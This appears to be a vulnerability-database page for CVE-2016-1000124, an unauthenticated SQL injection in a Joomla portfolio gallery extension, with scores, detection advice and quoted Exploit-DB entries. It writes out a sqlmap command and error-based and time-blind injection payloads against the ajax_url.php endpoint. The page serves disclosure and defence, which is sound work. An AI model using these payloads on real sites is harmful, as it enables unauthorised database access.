CVE-2016-1000124
published 2016-10-06CVE-2016-1000124: Unauthenticated SQL Injection in Huge-IT Portfolio Gallery Plugin v1.0.6
PriorityP262critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
2.55%
83.1th percentile
Unauthenticated SQL Injection in Huge-IT Portfolio Gallery Plugin v1.0.6
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| huge-it | portfolio_gallery | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandsqlmap -u 'http://example.com/components/com_portfoliogallery/ajax_url.php' --data="page=1&galleryid=*&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2" --level=5 --risk=3↗
commandpage=1&galleryid=-2264 OR 1 GROUP BY CONCAT(0x71716a7a71,(SELECT (CASE WHEN (3883=3883) THEN 1 ELSE 0 END)),0x7178627071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2↗
commandpage=1&galleryid=(CASE WHEN (9445=9445) THEN SLEEP(5) ELSE 9445 END)&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2↗
- →Monitor POST requests to /components/com_portfoliogallery/ajax_url.php for SQL injection patterns in the 'galleryid' parameter, including OR/GROUP BY/CONCAT/FLOOR(RAND()) error-based payloads and SLEEP()-based time-blind payloads. ↗
- →The vulnerable POST parameter is 'galleryid'; alert on values containing SQL keywords such as OR, GROUP BY, CONCAT, SLEEP, CASE WHEN in POST body to this endpoint. ↗
- →A high rate of HTTP 500 Internal Server Error responses from /components/com_portfoliogallery/ajax_url.php may indicate active SQL injection exploitation (sqlmap generated 2715 such errors during the PoC run). ↗
- →The exploit requires no authentication; any unauthenticated POST to ajax_url.php with the 'post' field set to 'huge_it_portfolio_gallery_ajax' should be treated as suspicious and inspected for injection payloads. ↗
- ·The file ajax_url.php is directly web-accessible outside the normal Joomla MVC dispatch path, bypassing standard Joomla access controls; restricting direct HTTP access to this file at the web-server level is an effective mitigation. ↗
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.6 - SQL Injection
exploitdb·2017-08-31·CVSS 9.8
CVE-2016-1000124 [CRITICAL] Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.6 - SQL Injection
Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.6 - SQL Injection
---
# Exploit Title Unauthenticated SQL Injection in Huge-IT Portfolio Gallery Plugin v1.0.6
# Date: 2016-09-16
# Exploit Author: Larry W. Cashdollar, @_larry0
# Vendor Homepage: http://huge-it.com/joomla-portfolio-gallery/
# Software Link:
# Version: 1.0.6
# Tested on: Linux
# CVE : CVE-2016-1000124
# Advisory: http://www.vapidlabs.com/advisory.php?v=170
# Exploit:
• $ sqlmap -u 'http://example.com/components/com_portfoliogallery/ajax_url.php' --data="page=1&galleryid=*&post=huge_it_portfolio_gallery_ajax&perpage=20&linkbutton=2"
•
•
• (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
• sqlmap identified the following injection point(s) with a total of 2870 HTTP(s)
Exploit-DB
Joomla! Component Portfolio Gallery 1.0.6 - SQL Injection
exploitdb·2016-09-16·CVSS 9.8
[CRITICAL] Joomla! Component Portfolio Gallery 1.0.6 - SQL Injection
Joomla! Component Portfolio Gallery 1.0.6 - SQL Injection
---
Title: Unauthenticated SQL Injection in Huge-IT Portfolio Gallery Joomla extension v1.0.6
Author: Larry W. Cashdollar, @_larry0
Date: 2016-09-16
Download Site: http://huge-it.com/joomla-portfolio-gallery/
Vendor: huge-it.com
Vendor Notified: 2016-09-17
Vendor Contact: [email protected]
Description: Huge-IT Portfolio Gallery extension can do wonders with your website. If you wish to show your photos, videos, enclosing the additional images and videos, then this Portfolio Gallery extension is what you need.
Vulnerability:
The following lines allow unauthenticated users to perform SQL injection against the functions in ajax_url.php:
In file ajax_url.php:
11 define('_JEXEC',1);
12 defined('_JEXEC') or die('Restircted access');
.
No writeups or analysis indexed.
http://huge-it.com/joomla-portfolio-gallery/http://www.securityfocus.com/bid/93268http://www.vapidlabs.com/advisory.php?v=170https://www.exploit-db.com/exploits/42597/http://huge-it.com/joomla-portfolio-gallery/http://www.securityfocus.com/bid/93268http://www.vapidlabs.com/advisory.php?v=170https://www.exploit-db.com/exploits/42597/
2016-10-06
Published